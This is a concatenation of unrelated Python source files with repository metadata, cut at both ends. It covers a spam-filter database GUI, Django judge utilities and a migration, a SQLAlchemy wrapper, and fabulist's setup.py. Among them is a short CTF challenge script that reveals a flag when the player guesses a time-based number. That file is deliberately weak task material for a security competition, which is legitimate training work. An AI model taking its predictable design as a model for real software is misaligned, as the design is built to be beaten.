TargDBDist[ii] = float(val)/100
assert TargDBDist[ii]>=0 and TargDBDist[ii]<=1,"Sample distribution targets must be in the range [0,1]"
except ValueError as detail :
logging.error("Could not convert one of the sample distribution targets to a float: %s"%detail)
TargDBDist[ii] = None
except AssertionError as detail :
logging.error(detail)
TargDBDist[ii] = None
if sum(TargDBDist) == 1 :
return tuple(TargDBDist)
else :
logging.error("Total of the sample distribution targets must be 1")
return (None,None,None)
def DefineButtonsFrame(self) :
ButFrame = tki.Frame(self)
self.CreateDBBut = tki.Button(ButFrame,text="Create DB",command=self.NewDB)
self.CreateDBBut.grid(row=0,column=0,padx=5,sticky=tki.W+tki.E)
self.AttachDBBut = tki.Button(ButFrame,text="Attach DB",command=self.OpenDB)
self.AttachDBBut.grid(row=0,column=1,padx=5,sticky=tki.W+tki.E)
self.CloseDBBut = tki.Button(ButFrame,text="Close DB",command=self.CloseDB)
self.CloseDBBut.grid(row=0,column=2,padx=5,sticky=tki.W+tki.E)
self.AddToDBBut = tki.Button(ButFrame,text="Add to DB",command=self.AddDB)
self.AddToDBBut.grid(row=0,column=3,padx=5,sticky=tki.W+tki.E)
self.ResetDBBut = tki.Button(ButFrame,text="Reset DB",command=self.ResetDB)
self.ResetDBBut.grid(row=0,column=4,padx=5,sticky=tki.W+tki.E)
ButFrame.grid_columnconfigure(0,weight=1)
ButFrame.grid_columnconfigure(1,weight=1)
ButFrame.grid_columnconfigure(2,weight=1)
ButFrame.grid_columnconfigure(3,weight=1)
ButFrame.grid_columnconfigure(4,weight=1)
self.connect_text = tki.StringVar(ButFrame)
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.ConnectionLabel = tki.Label(ButFrame,textvariable=self.connect_text,justify="left")
self.ConnectionLabel.grid(row=1,column=0,columnspan=5,sticky=tki.W)
return ButFrame
# Function callbacks for GUI buttons
def asklegitdirectory(self) :
dirstr = tkFileDialog.askdirectory(**self.legitdir_opt)
if dirstr :
self.GoodSamples.delete(0,tki.END)
self.GoodSamples.insert(0,dirstr)
self.legitdir_opt['initialdir'] = dirstr
if self.spamdir_opt['initialdir'] == os.path.abspath(r'.') :
self.spamdir_opt['initialdir'] = dirstr
return
def askspamdirectory(self) :
dirstr = tkFileDialog.askdirectory(**self.spamdir_opt)
if dirstr :
self.SpamSamples.delete(0,tki.END)
self.SpamSamples.insert(0,dirstr)
self.spamdir_opt['initialdir'] = dirstr
if self.legitdir_opt['initialdir'] == os.path.abspath(r'.') :
self.legitdir_opt['initialdir'] = dirstr
return
def NewDB(self) :
"""
Ask for a filename to create a new database file, then create a new database and initialize
the required tables.
"""
self.dbfile_opt['title'] = 'Create a new email database file'
filename = tkFileDialog.asksaveasfilename(**self.dbfile_opt)
logging.debug('Connecting to database at %s'%filename)
self.DBobj.ConnectDB(filename)
logging.debug('Result: %s'%self.DBobj.DB_Connect)
try :
logging.debug('Creating fresh database at %s'%filename)
self.DBobj.CreateDB()
finally :
logging.debug('Disconnecting database at %s'%self.DBobj.DB_Connect)
self.DBobj.DisconnectDB()
logging.debug('Result: %s'%self.DBobj.DB_Connect)
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def OpenDB(self) :
"""
Open a feature vector database file, extract the available word lists that feature vectors can be
created against, and populate the word list drop down menu
"""
self.dbfile_opt['title'] = 'Select an existing email database file'
filename = tkFileDialog.askopenfilename(**self.dbfile_opt)
self.DBobj.DBpath = filename
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def CloseDB(self) :
"""
Forgets the path the database currently in use. Should not need to actually close the connection
because the connection should not be held open by any thread (that would block the database from
other threads).
"""
assert self.DBobj.DB_Connect is None, "Expected database connection to already be closed, but it wasn't"
self.DBobj.DBpath = None
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def AddDB(self) :
"""
"""
def cmd(*args) :
self.DBobj.ConnectDB()
self.DBobj.AddToDB(*args)
self.DBobj.DisconnectDB()
TargDBDist = self.GetTargetDBDist()
emailspath = self.GoodSamples.get()
if emailspath :
classname = str(self.DBobj.SQLCMDs['ClassesList'][0])
args = [emailspath,classname,TargDBDist]
ProgressWindow(self,cmd,*args,title="Progress adding emails")
spampath = self.SpamSamples.get()
if spampath :
classname = str(self.DBobj.SQLCMDs['ClassesList'][1])
args = [spampath,classname,TargDBDist]
ProgressWindow(self,cmd,*args,title="Progress adding spam")
self.UpdateDBDist()
return
def ResetDB(self) :
self.DBobj.ConnectDB()
try :
self.DBobj.ResetDB()
self.DBobj.CreateDB()
except Exception as detail :
logging.error(detail)
finally :
self.DBobj.DisconnectDB()
self.UpdateDBDist()
###################################### Main Program ######################################
if __name__ == "__main__" :
logging.basicConfig(level=logging.DEBUG)
#pdb.set_trace()
parser = argparse.ArgumentParser(description='Email samples database building GUI')
parser.add_argument('--pragmapath','-p',
help='path to a json file with the PRAGMA commands for the database',
default=os.path.abspath(r'.\DBSetup_SQL.json'))
parser.add_argument('--sqlpath','-s',
help='path to a json file with the SQL commands for the database',
default=os.path.abspath(r'.\EmailSamplesDB_SQL.json'))
parser.add_argument('--tempsqlpath','-t',
help='path to a json file with the SQL commands for temp databases',
default=os.path.abspath(r'.\TempDB_SQL.json'))
parser.add_argument('--initialdir','-d',
help='path to an initial directory to start looking for files',
default=os.path.abspath(r'.'))
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
paramsobj = parser.parse_args()
params = vars(paramsobj)
testDB = EmailSamplesDB(params['sqlpath'],params['pragmapath'],params['tempsqlpath'])
root = tki.Tk()
root.wm_title("Test the database building dialog")
icon_image = tki.Image("photo",file=os.path.abspath(r".\MainGUI.gif"))
root.tk.call('wm','iconphoto',root._w,icon_image)
initdir = os.path.abspath(r'.')
DBBuildGUI(root,testDB,initialdir=initdir)
|
{
"content_hash": "07766c01a2180af1796d67d107373a45",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 127,
"avg_line_length": 39.94603174603174,
"alnum_prop": 0.7043630294842248,
"repo_name": "joecole889/spam-filter",
"id": "8e747da93ee6b0c373457b82d1cf24a3c7a6a709",
"size": "12608",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DBBuildGUI.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6721"
},
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "Python",
"bytes": "101113"
}
],
"symlink_target": ""
}
|
"""
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOsT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from threading import Thread
import hashlib
import random
from django.core.urlresolvers import reverse
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from django.http import HttpResponseRedirect
from contest.models import Contest
from contest.models import Contestant
from problem.models import Submission, SubmissionDetail
from users.models import User, UserProfile, Notification
from utils.log_info import get_logger
from utils.config_info import get_config
from django.conf import settings
EMAIL_HOST_USER = get_config('email', 'user')
logger = get_logger()
def has_contest_ownership(curr_user, curr_contest):
curr_user = validate_user(curr_user)
if curr_user == curr_contest.owner:
return True
contest_coowners = curr_contest.coowner.all()
return curr_user in contest_coowners
def has_group_ownership(curr_user, curr_group):
curr_user = validate_user(curr_user)
if curr_user == curr_group.owner or curr_user.has_admin_auth():
return True
return False
def has_group_coownership(curr_user, curr_group):
curr_user = validate_user(curr_user)
group_coowners = curr_group.coowner.all()
if group_coowners:
for coowner in group_coowners:
if curr_user == coowner:
return True
return False
def has_problem_ownership(curr_user, curr_problem):
curr_user = validate_user(curr_user)
return curr_user == curr_problem.owner
def has_problem_auth(user, problem):
"""Check if user has authority to see/submit that problem"""
user = validate_user(user)
if problem.visible:
return True
last_contest = problem.contest_set.all().order_by('-start_time')
if last_contest and last_contest[0].start_time < datetime.now():
problem.visible = True
problem.save()
return True
# check the invisible problem
# To see/submit an invisible problem, user must
# 1. has admin auth
if user.has_admin_auth():
return True
# 2. be the problem owner
if has_problem_ownership(user, problem):
return True
# 3. be a contest owner/coowner
contests = Contest.objects.filter(
creation_time__lte=datetime.now(),
end_time__gte=datetime.now(),
problem=problem)
for contest in contests:
if has_contest_ownership(user, contest):
return True
# None of the condition is satisfied
return False
def validate_user(user):
# an anonymous user is treated as a normal user
if user.is_anonymous():
user = User() # create a temporary user instance with on attribute
return user
def get_user_statistics(user):
"""Find the statistics of the given user"""
# fetch some status labels in Submissions
# here, we only concern about COMPILE_ERROR, RESTRICTED_FUNCTION,
# and JUDGE_ERROR since ACCEPTED, NOT_ACCEPTED, etc will appear in
# SubmissionDetail.VERDICT_CHOICE
status_labels = [
Submission.COMPILE_ERROR,
Submission.RESTRICTED_FUNCTION,
Submission.JUDGE_ERROR
]
# find all verdict in SubmissionDetail.VERDICT_CHOICE
verdict_labels = [x[0] for x in SubmissionDetail.VERDICT_CHOICE]
statistics = []
# fetch Submission of the given user
submissions = Submission.objects.filter(user=user)
for label in status_labels:
statistics += [{
'label': label,
'value': submissions.filter(status=label).count()
}]
# fetch Submission of the given user
submissions_id = map(lambda submission: submission.id, submissions)
submission_details = SubmissionDetail.objects.filter(
sid__in=submissions_id)
for label in verdict_labels:
statistics += [{
'label': label,
'value': submission_details.filter(verdict=label).count()
}]
return statistics
def send_activation_email(request, user):
username = user.username
email = user.email
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
activation_key = hashlib.sha1(salt + email).hexdigest()
# Create and save user profile
new_profile = UserProfile(user=user, activation_key=activation_key)
new_profile.save()
# Send email with activation key
activation_link = request.META['HTTP_HOST'] + \
reverse('users:confirm', kwargs={'activation_key': activation_key})
email_subject = 'Account confirmation'
email_body = render_to_string('index/activation_email.html',
{'username': username, 'activation_link': activation_link,
'active_time': new_profile.active_time})
msg = EmailMultiAlternatives(
email_subject, email_body, EMAIL_HOST_USER, [email])
msg.attach_alternative(email_body, "text/html")
try:
Thread(target=msg.send, args=()).start()
except:
logger.warning(
"There is an error when sending email to %s's mailbox" % username)
def send_forget_password_email(request, user):
username = user.username
email = user.email
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
activation_key = hashlib.sha1(salt + email).hexdigest()
# Create and save user profile
UserProfile.objects.filter(user=user).delete()
new_profile = UserProfile(user=user, activation_key=activation_key)
new_profile.save()
# Send email with activation key
profile_link = request.META['HTTP_HOST'] + \
reverse('users:forget_password_confirm',
kwargs={'activation_key': activation_key})
email_subject = 'Password Reset'
email_body = render_to_string('index/forget_password_email.html',
{'username': username, 'profile_link': profile_link,
'active_time': new_profile.active_time})
msg = EmailMultiAlternatives(
email_subject, email_body, EMAIL_HOST_USER, [email])
msg.attach_alternative(email_body, "text/html")
try:
Thread(target=msg.send, args=()).start()
except:
logger.warning(
"There is an error when sending email to %s's mailbox" % username)
def send_notification(user, content):
try:
Notification.objects.create(receiver=user, message=content)
logger.info("send notification to %s successfully" % user.username)
except:
logger.warning(
"There is an error when sending notification to %s" % user.username)
|
{
"content_hash": "fd550404c33767392d205fc1df988a62",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 92,
"avg_line_length": 34.43693693693694,
"alnum_prop": 0.6837148463047744,
"repo_name": "bruce3557/NTHUOJ_web",
"id": "88a73bdf67c799ebb80cd22070cb01881b506e67",
"size": "7645",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "utils/user_info.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "17559"
},
{
"name": "HTML",
"bytes": "121385"
},
{
"name": "JavaScript",
"bytes": "53271"
},
{
"name": "Python",
"bytes": "241520"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('netobjects', '0006_auto_20170426_1639'),
]
operations = [
migrations.AlterField(
model_name='corenetworkobject',
name='cli_address',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='corenetworkobject',
name='dns_address',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='corenetworkobject',
name='ipv4_external_address',
field=models.CharField(blank=True, max_length=255),
),
]
|
{
"content_hash": "db1bb02cdb2704db78cbc99792584364",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 63,
"avg_line_length": 28,
"alnum_prop": 0.5892857142857143,
"repo_name": "Landver/netmon",
"id": "5327a0b2e7725b1d7fe014bedb6c4d5aef473275",
"size": "855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/netobjects/migrations/0007_auto_20170426_1726.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2142"
},
{
"name": "HTML",
"bytes": "43874"
},
{
"name": "JavaScript",
"bytes": "3841"
},
{
"name": "Python",
"bytes": "76302"
},
{
"name": "Shell",
"bytes": "4188"
}
],
"symlink_target": ""
}
|
"""
"""
from collections import namedtuple
import inspect
import logging
from sqlalchemy import inspect as sqinspect
from sqlalchemy.exc import NoInspectionAvailable
from sqlalchemy.ext.associationproxy import AssociationProxy
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.orm import ColumnProperty, Query
from sqlalchemy.orm.attributes import QueryableAttribute
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.orm.interfaces import MapperProperty
from sqlalchemy.orm.properties import RelationshipProperty
from sqlalchemy.sql.operators import is_ordering_modifier
from sqlalchemy.util import memoized_property
__author__ = 'Martin Martimeo <martin@martimeo.de>'
__date__ = '27.04.13 - 00:14'
def _filter(instance, condition) -> dict:
"""
Filter properties of instace based on condition
:param instance:
:param condition:
:rtype: dict
"""
# Use iterate_properties when available
if hasattr(instance, 'iterate_properties'):
return {field.key: field for field in instance.iterate_properties
if condition(field)}
# Try sqlalchemy inspection
try:
inspection = sqinspect(instance)
if hasattr(inspection, "all_orm_descriptors"):
return {field.key: field for key, field in inspection.all_orm_descriptors.items()
if condition(field)}
elif hasattr(inspection, "attrs"):
return {field.key: field for key, field in inspection.attrs.items()
if condition(field)}
else:
raise NoInspectionAvailable()
# Use Inspect
except NoInspectionAvailable:
return {field.key: field for key, field in inspect.getmembers(instance)
if condition(field)}
def _is_ordering_expression(expression):
"""
Test an expression whether it is an ordering clause
"""
if hasattr(expression, 'operator') and is_ordering_modifier(expression.operator):
return True
if hasattr(expression, 'modifier') and is_ordering_modifier(expression.modifier):
return True
return False
class ModelWrapper(object):
"""
Wrapper around sqlalchemy model for having some easier functions
"""
def __init__(self, model):
self.model = model
@property
def __name__(self):
return self.model.__name__
@property
def __tablename__(self):
return self.model.__tablename__
@property
def __collectionname__(self):
try:
return self.model.__collectionname__
except AttributeError:
logging.warning("Missing collection name for %s using tablename" % self.model.__name__)
return self.model.__tablename__
@staticmethod
def get_primary_keys(instance) -> dict:
"""
Returns the primary keys
Inspired by flask-restless.helpers.primary_key_names
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) and field.primary_key or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty) and
hasattr(field.property.columns[0], 'primary_key') and field.property.columns[0].primary_key))
@memoized_property
def primary_keys(self):
"""
@see get_primary_keys
"""
return self.get_primary_keys(self.model)
primary_keys.__doc__ = get_primary_keys.__func__.__doc__
@staticmethod
def get_unique_keys(instance) -> dict:
"""
Returns the primary keys
Inspired by flask-restless.helpers.primary_key_names
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) and field.unique or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty) and
hasattr(field.property.columns[0], 'unique') and field.property.columns[0].unique))
@memoized_property
def unique_keys(self):
"""
@see get_primary_keys
"""
return self.get_unique_keys(self.model)
unique_keys.__doc__ = get_unique_keys.__func__.__doc__
@staticmethod
def get_foreign_keys(instance) -> list:
"""
Returns the foreign keys
Inspired by flask-restless.helpers.primary_key_names
"""
return {field.key: field for key, field in inspect.getmembers(instance)
if isinstance(field, QueryableAttribute)
and isinstance(field.property, ColumnProperty)
and field.foreign_keys}
@memoized_property
def foreign_keys(self):
"""
@see get_foreign_keys
"""
return self.get_foreign_keys(self.model)
foreign_keys.__doc__ = get_foreign_keys.__func__.__doc__
@staticmethod
def get_columns(instance) -> dict:
"""
Returns the columns objects of the model
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty)))
@memoized_property
def columns(self):
"""
@see get_columns
"""
return self.get_columns(self.model)
columns.__doc__ = get_columns.__func__.__doc__
@staticmethod
def get_attributes(instance) -> dict:
"""
Returns the attributes of the model
"""
return _filter(instance,
lambda field: isinstance(field, MapperProperty) or isinstance(field, QueryableAttribute))
@memoized_property
def attributes(self):
"""
@see get_attributes
"""
return self.get_attributes(self.model)
attributes.__doc__ = get_attributes.__func__.__doc__
@staticmethod
def get_relations(instance) -> dict:
"""
Returns the relations objects of the model
"""
return _filter(instance, lambda field: isinstance(field, RelationshipProperty) or (
isinstance(field, QueryableAttribute) and isinstance(field.property, RelationshipProperty)))
@memoized_property
def relations(self):
"""
@see get_relations
"""
return self.get_relations(self.model)
relations.__doc__ = get_relations.__func__.__doc__
@staticmethod
def get_hybrids(instance) -> list:
"""
Returns the relations objects of the model
"""
Proxy = namedtuple('Proxy', ['key', 'field'])
# Try sqlalchemy inspection
try:
return [Proxy(key, field) for key, field in sqinspect(instance).all_orm_descriptors.items()
if isinstance(field, hybrid_property)]
# Use Inspect
except NoInspectionAvailable:
return [Proxy(key, field) for key, field in inspect.getmembers(instance)
if isinstance(field, hybrid_property)]
@memoized_property
def hybrids(self) -> list:
"""
@see get_hybrids
"""
return self.get_hybrids(self.model)
hybrids.__doc__ = get_hybrids.__func__.__doc__
@staticmethod
def get_proxies(instance) -> list:
"""
Returns the proxies objects of the model
Inspired by https://groups.google.com/forum/?fromgroups=#!topic/sqlalchemy/aDi_M4iH7d0
"""
Proxy = namedtuple('Proxy', ['key', 'field'])
if hasattr(instance, 'iterate_properties'):
return [Proxy(key, field) for key, field in sqinspect(instance).all_orm_descriptors.items()
if isinstance(field, AssociationProxy)]
else:
return [Proxy(key, field) for key, field in inspect.getmembers(instance)
if isinstance(field, AssociationProxy)]
@memoized_property
def proxies(self):
"""
@see get_proxies
"""
return self.get_proxies(self.model)
proxies.__doc__ = get_proxies.__func__.__doc__
class SessionedModelWrapper(ModelWrapper):
"""
Wrapper around sqlalchemy model for having some easier functions
"""
def __init__(self, model, session):
super().__init__(model)
self.session = session
@staticmethod
def _apply_kwargs(instance: Query, **kwargs) -> Query:
for expression in kwargs.pop('filters', []):
if _is_ordering_expression(expression):
instance = instance.order_by(expression)
else:
instance = instance.filter(expression)
if 'offset' in kwargs:
offset = kwargs.pop('offset')
foffset = lambda instance: instance.offset(offset)
else:
foffset = lambda instance: instance
if 'limit' in kwargs:
limit = kwargs.pop('limit')
flimit = lambda instance: instance.limit(limit)
else:
flimit = lambda instance: instance
instance = instance.filter_by(**kwargs)
instance = foffset(instance)
instance = flimit(instance)
return instance
def one(self, filters: list=(), **kwargs) -> object:
"""
Gets one instance of the model filtered by filters
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).one()
def all(self, filters: list=(), **kwargs) -> list:
"""
Gets all instances of the query instance
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).all()
def update(self, values: dict, filters: list=(), **kwargs) -> int:
"""
Updates all instances of the model filtered by filters
:param values: Dictionary of values
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).update(values)
def delete(self, filters: list=(), **kwargs) -> int:
"""
Delete all instances of the model filtered by filters
:param values: Dictionary of values
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).delete()
def count(self, filters: list=(), **kwargs) -> int:
"""
Gets the instance count
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).order_by(False).count()
def get(self, *pargs) -> object:
"""
Gets one instance of the model based on primary_keys
:param pargs: ident
:raise NoResultFound: If no element has been received
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
if not isinstance(pargs, tuple):
rtn = instance.get(*pargs)
else:
rtn = instance.get(pargs)
if not rtn:
raise NoResultFound("No element recieved for %s(%s)" % (self.__collectionname__, pargs))
return rtn
def __call__(self, **kwargs):
instance = self.model()
for key, value in kwargs.items():
setattr(instance, key, value)
self.session.add(instance)
return instance
|
{
"content_hash": "d8f8b1994ebcb7d41d322357c7c6bb5a",
"timestamp": "",
"source": "github",
"line_count": 395,
"max_line_length": 112,
"avg_line_length": 32.81518987341772,
"alnum_prop": 0.6113254127449468,
"repo_name": "tornado-utils/tornado-restless",
"id": "e048828c29d1a5db1f4fcb50aa443ac68722cc1f",
"size": "13006",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tornado_restless/wrapper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "75851"
}
],
"symlink_target": ""
}
|
import sys
import os
import random
import time
FLAG = os.environ["TASK1_FLAG"]
OFFSET = random.randint(38, 42)
def get_correct():
return int(time.time()) + OFFSET
print("Download path <game server>/0c16c4dd438b0042c4d725fab588e648.py\n")
print("Oh! Look what time it is: " + str(int(time.time())))
print("Yes! It's guessing o'clock!")
while True:
try:
s = input("Now, tell me the number I'm thinking about: ")
v = int(s.strip())
if v != get_correct():
print("Hahaha. No.")
continue
print(FLAG)
break
except ValueError:
print("That's not a number, go away.")
break
except EOFError:
print("Ohes Noes!")
break
|
{
"content_hash": "05f53ae141ec5f1428ebfc557a2af96d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 74,
"avg_line_length": 19.2,
"alnum_prop": 0.6428571428571429,
"repo_name": "google/google-ctf",
"id": "c2ae5dde8219d16f045790789944fa618e63ab76",
"size": "691",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "2020/hackceler8/match-pre-package/game/static/0c16c4dd438b0042c4d725fab588e648.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "AIDL",
"bytes": "508"
},
{
"name": "Assembly",
"bytes": "107617"
},
{
"name": "BASIC",
"bytes": "6068"
},
{
"name": "Batchfile",
"bytes": "1032"
},
{
"name": "Blade",
"bytes": "14530"
},
{
"name": "C",
"bytes": "1481904"
},
{
"name": "C++",
"bytes": "2139472"
},
{
"name": "CMake",
"bytes": "11595"
},
{
"name": "CSS",
"bytes": "172375"
},
{
"name": "Dart",
"bytes": "6282"
},
{
"name": "Dockerfile",
"bytes": "232352"
},
{
"name": "EJS",
"bytes": "92308"
},
{
"name": "Emacs Lisp",
"bytes": "2668"
},
{
"name": "GDB",
"bytes": "273"
},
{
"name": "GLSL",
"bytes": "33392"
},
{
"name": "Go",
"bytes": "3031142"
},
{
"name": "HTML",
"bytes": "467647"
},
{
"name": "Java",
"bytes": "174199"
},
{
"name": "JavaScript",
"bytes": "2643200"
},
{
"name": "Lua",
"bytes": "5944"
},
{
"name": "Makefile",
"bytes": "149152"
},
{
"name": "NSIS",
"bytes": "2800"
},
{
"name": "Nix",
"bytes": "139"
},
{
"name": "PHP",
"bytes": "311900"
},
{
"name": "Perl",
"bytes": "32742"
},
{
"name": "Pug",
"bytes": "8752"
},
{
"name": "Python",
"bytes": "1756592"
},
{
"name": "Red",
"bytes": "188"
},
{
"name": "Rust",
"bytes": "541267"
},
{
"name": "Sage",
"bytes": "39814"
},
{
"name": "Shell",
"bytes": "382149"
},
{
"name": "Smali",
"bytes": "2316656"
},
{
"name": "Starlark",
"bytes": "8216"
},
{
"name": "SystemVerilog",
"bytes": "16466"
},
{
"name": "VCL",
"bytes": "895"
},
{
"name": "Verilog",
"bytes": "7230"
},
{
"name": "Vim Script",
"bytes": "890"
},
{
"name": "Vue",
"bytes": "10248"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import os
import sys
from setuptools import Command, setup
from setuptools.command.test import test as TestCommand
from fabulist import __version__
# Override 'setup.py test' command
class ToxCommand(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# Import here, cause outside the eggs aren't loaded
import tox
errcode = tox.cmdline(self.test_args)
sys.exit(errcode)
# Add custom command 'setup.py sphinx'
# See https://dankeder.com/posts/adding-custom-commands-to-setup-py/
# and http://stackoverflow.com/a/22273180/19166
class SphinxCommand(Command):
user_options = []
description = "Build docs using Sphinx"
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import subprocess
# sourcedir = os.path.join("docs", "sphinx")
outdir = os.path.join("docs", "sphinx-build")
res = subprocess.call(
"sphinx-build -b html docs/sphinx docs/sphinx-build", shell=True
)
if res:
print("ERROR: sphinx-build exited with code {}".format(res))
else:
print("Documentation created at {}.".format(os.path.abspath(outdir)))
try:
readme = open("README.md", "rt").read()
# readme = open("readme_pypi.rst", "rt").read()
except IOError:
readme = "(readme not found. Running from tox/setup.py test?)"
try:
from cx_Freeze import Executable, setup # noqa
executables = [
Executable(
script="fabulist/fabulist.py",
base=None,
targetName="fabulist.exe",
# icon= "doc/logo.ico",
shortcutName="fabulist",
)
]
except ImportError:
# tox has problems to install cx_Freeze to it's venvs, but it is not needed
# for the tests anyway
print(
"Could not import cx_Freeze; 'build' and 'bdist' commands will not be available."
)
print("See https://pypi.python.org/pypi/cx_Freeze")
executables = []
# # 'setup.py upload' fails on Vista, because .pypirc is searched on 'HOME' path
# if not "HOME" in os.environ and "HOMEPATH" in os.environ:
# os.environ.setdefault("HOME", os.environ.get("HOMEPATH", ""))
# print("Initializing HOME environment variable to '{}'".format(os.environ["HOME"]))
install_requires = []
tests_require = [
"pytest",
"pytest-cov",
"tox",
"virtualenv",
]
setup_requires = install_requires
build_exe_options = {
"init_script": "Console",
"includes": install_requires,
"packages": [],
"constants": "BUILD_COPYRIGHT='(c) 2017 Martin Wendt'",
}
bdist_msi_options = {
"upgrade_code": "{69D828C9-7AA2-4822-901E-0BA7E6D1EBE3}",
"add_to_path": True,
# TODO: configure target dir
# "initial_target_dir": r"[ProgramFilesFolder]\%s\%s" % (company_name, product_name),
# TODO: configure shortcuts:
# http://stackoverflow.com/a/15736406/19166
}
setup(
name="fabulist",
version=__version__,
author="Martin Wendt",
author_email="fabulist@wwwendt.de",
# copyright="(c) 2017 Martin Wendt",
maintainer="Martin Wendt",
maintainer_email="fabulist@wwwendt.de",
url="https://github.com/mar10/fabulist",
description="Generate random strings that make sense.",
long_description=readme,
long_description_content_type="text/markdown",
# Development Status :: 2 - Pre-Alpha
# Development Status :: 3 - Alpha
# Development Status :: 4 - Beta
# Development Status :: 5 - Production/Stable
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Information Technology",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
# "Programming Language :: Python :: 3.4",
# "Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
],
keywords="python test-data word-list generator mock",
license="The MIT License",
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
packages=["fabulist"],
package_data={"fabulist": ["data/*.txt"]},
zip_safe=False,
extras_require={},
cmdclass={
"test": ToxCommand,
"sphinx": SphinxCommand,
},
# entry_points = {
# "console_scripts" : ["fabulist = fabulist.fabulist:run"],
# },
executables=executables,
options={
"build_exe": build_exe_options,
"bdist_msi": bdist_msi_options,
},
)
|
{
"content_hash": "bbb2997af3d62983c3f37a2c898e1fea",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 89,
"avg_line_length": 30.041176470588237,
"alnum_prop": 0.6205208537301743,
